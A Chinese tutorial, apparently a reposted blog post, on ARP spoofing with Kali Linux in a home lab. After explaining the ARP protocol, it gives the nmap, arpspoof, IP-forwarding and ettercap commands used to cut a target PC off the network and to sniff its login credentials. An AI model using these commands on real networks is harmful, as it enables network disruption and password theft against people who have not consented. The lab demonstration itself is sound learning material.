Kali ARP断网攻击与流量监听

这篇具有很好参考价值的文章主要介绍了Kali ARP断网攻击与流量监听。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

作者:geek_Niko

声明:

本文仅供学习使用,请勿用作其他用途。任何未经允许的渗透行为均属违法行为。

目的:

如何借助Kali Linux系统内置的nmap、arpspoof、ettercap等渗透测试工具对局域网内同个网段的PC主机进行ARP欺骗和流量监听,实现断网攻击、密码窃取等

工具:
工具 说明
nmap 网络扫描工具,用于扫描局域网存活设备和开放端口与对应开启的服务
arpspoof ARP欺骗工具,可毒化受害者ARP缓存,将网关MAC地址替换为攻击者MAC
ettercap 网络抓包工具,利用ARP协议的缺陷进行中间人攻击,嗅探局域网数据流量
实验环境:
主机 IP地址
Kali Linux 192.168.2.208
Win11物理机 192.168.2.223

备注:Kali Linux虚拟机使用桥接模式与Win11物理机处于同一局域网下

🚀ARP欺骗原理

1、ARP协议

​ 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存。

2、ARP工作过程

​ 假设主机A和B在同一个网段,主机A要向主机B发送信息,具体的地址解析过程如下:

  1. 主机A首先查看自己的ARP缓存表,确定其中是否包含有主机B对应的ARP表项。如果找到了对应的MAC地址,则主机A直接利用ARP表中的MAC地址,对IP数据包进行帧封装,并将数据包发送给主机B。
  2. 如果主机A在ARP表中找不到对应的MAC地址,则将缓存该数据报文,然后以广播方式发送一个ARP请求报文。ARP请求报文中的发送端IP地址和发送端MAC地址为主机A的IP地址和MAC地址,目标IP地址和目标MAC地址为主机B的IP地址和全0的MAC地址。由于ARP请求报文以广播方式发送,该网段上的所有主机都可以接收到该请求,但只有被请求的主机(即主机B)会对该请求进行处理。
  3. 主机B比较自己的IP地址和ARP请求报文中的目标IP地址,当两者相同时进行如下处理:将ARP请求报文中的发送端(即主机A)的IP地址和MAC地址存入自己的ARP表中。之后以单播方式发送ARP响应报文给主机A,其中包含了自己的MAC地址。
  4. 主机A收到ARP响应报文后,将主机B的MAC地址加入到自己的ARP表中以用于后续报文的转发,同时将IP数据包进行封装后发送出去。

​ 当主机A和主机B不在同一网段时,主机A就会先向网关发出ARP请求,ARP请求报文中的目标IP地址为网关的IP地址。当主机A从收到的响应报文中获得网关的MAC地址后,将报文封装并发给网关。如果网关没有主机B的ARP表项,网关会广播ARP请求,目标IP地址为主机B的IP地址,当网关从收到的响应报文中获得主机B的MAC地址后,就可以将报文发给主机B;如果网关已经有主机B的ARP表项,网关直接把报文发给主机B。

3、ARP欺骗

​ 地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。

​ 由于ARP缓存表不是实时更新的,如果在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

一、断网攻击

1、设置Kali虚拟机网络为桥接模式并查看ip地址和网关

#ifconfig

kalilinuxarp攻击,渗透测试,网络,linux,服务器

#route -n
kalilinuxarp攻击,渗透测试,网络,linux,服务器

2、使用nmap扫描局域网存活主机与信息

#nmap -sP 192.168.2.0/24

kalilinuxarp攻击,渗透测试,网络,linux,服务器

3、运行arpspoof工具实现ARP断网攻击

#arpspoof -i eth0 -t 192.168.2.223(目标IP) 192.168.2.1(网关IP)

kalilinuxarp攻击,渗透测试,网络,linux,服务器

4、结果
未攻击前正常上网

kalilinuxarp攻击,渗透测试,网络,linux,服务器

攻击开始后win11主机无法上网

kalilinuxarp攻击,渗透测试,网络,linux,服务器
kalilinuxarp攻击,渗透测试,网络,linux,服务器

关闭攻击后网络恢复

kalilinuxarp攻击,渗透测试,网络,linux,服务器

二、流量监听

1、修改端口转发配置
1)临时修改
a)修改参数

#sysctl -w net.ipv4.ip_forward=1

kalilinuxarp攻击,渗透测试,网络,linux,服务器

b)更新系统配置

sysctl -p

2)永久修改
a)使用vim修改/etc/sysctl.conf配置文件

#vim /etc/sysctl.conf

b)添加修改内容
net.ipv4.ip_forward=1 #开机端口转发功能
c)更新系统配置

#sysctl -p

2、运行arpspoof攻击,实现流量转发代理

#arpspoof -i eth0 -t 192.168.2.1(网关IP) 192.168.2.223(目标IP)

kalilinuxarp攻击,渗透测试,网络,linux,服务器

win11靶机联网正常,端口转发成功

kalilinuxarp攻击,渗透测试,网络,linux,服务器

3、ettercap窃听数据

注:需开启新的终端

1)开始窃听

#ettercap -Tq -i eth0

kalilinuxarp攻击,渗透测试,网络,linux,服务器

2)靶机win11上打开一个网站,并且输入账号密码进行登录

kalilinuxarp攻击,渗透测试,网络,linux,服务器

3)成功窃听到对应靶机发出的请求数据

kalilinuxarp攻击,渗透测试,网络,linux,服务器文章来源地址https://www.toymoban.com/news/detail-743291.html

4)ettercap用法
选项 描述
-l 显示可用网卡接口设备
-i 选择接口
-t 协议选择,tcp/udp/all,默认all
-p 不进行毒化攻击,用于嗅探本地数据包
-L 载入过滤器文件
-V text 将数据包以文本形式显示在屏幕上
-L filename 把所有的数据包保存下来(保存后的文件只能用etterlog显示)
🚀本次演示到此结束🚀

到了这里,关于Kali ARP断网攻击与流量监听的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux断网攻击

    ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 一句话解释: 断网攻击用使用ARPspoof工具,欺骗设备,截断网关

    2024年01月24日
    浏览(51)
  • ARP渗透与攻防(五)之Ettercap劫持用户流量

    系列文章 ARP渗透与攻防(一)之ARP原理 ARP渗透与攻防(二)之断网攻击 ARP渗透与攻防(三)之流量分析 ARP渗透与攻防(四)之WireShark截获用户数据 项目官网:http://ettercap.github.io/ettercap/index.html EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于Etter

    2024年02月02日
    浏览(36)
  • 《Kali渗透基础》16. 密码攻击

    本系列侧重方法论,各工具只是实现目标的载体。 命令与工具只做简单介绍,其使用另见《安全工具录》。 本文以 kali-linux-2023.2-vmware-amd64 为例。 身份认证:证明你是你声称的那个人。 非授权用户不受信任,认证用户可以访问相关资源。 认证类型: 你知道什么(账号密码

    2024年01月18日
    浏览(46)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(42)
  • 【Kali Linux高级渗透测试】深入剖析Kali Linux:高级渗透测试技术与实践

    📕作者简介: 热爱跑步的恒川 ,致力于C/C++、Java、Python等多编程语言,热爱跑步,喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列,大家有兴趣的可以看一看 📘相关专栏C语言初阶、C语言进阶系列、恒川等,大家有兴趣的可以看一看 📙Python零基础入门系列,J

    2024年02月10日
    浏览(46)
  • kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)

    平台及工具: linux:kali平台 aircrack - ng 工具 免驱监听网卡 详细操作 1.首先启动kali,插入网卡,输入ifconfig查看kali是否检测到监听网卡,注意监听网卡要免驱动的。  如图,看到wlan0就代表kali成功检测到监听网卡啦。 2.在启动网卡的监听模式之前一定要杀死进程,否则将会监

    2024年02月16日
    浏览(37)
  • Kali Linux渗透测试技术详解_渗透测试入门

    知识点 1. Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. 基本用法-重新设置root密码 5 安装debian11系统-默认命令行模式登录 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、

    2024年02月13日
    浏览(52)
  • 学习Kali渗透测试笔记

    1. 软件测试 功能 性能:高并发环境下工作效率 安全:访问控制、系统数据的完整性、系统数据的机密性、可靠性 2. 安全测试与渗透测试 比较 安全测试 渗透测试 出发点 找出所有安全隐患 证明存在问题 视角 防护者 攻击者 覆盖性 所有可能的攻击界面更加完善 几个测试点

    2023年04月09日
    浏览(51)
  • kali渗透测试系列---信息收集

    信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再到 web 应用开发的语言等等的种类多如繁星我们一个个的尝试,什么时候才是一个头。 而对于信息的收集我们主要从这样的几个方面来收

    2024年02月03日
    浏览(43)
  • 【Kali Linux】高级渗透测试实战篇

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包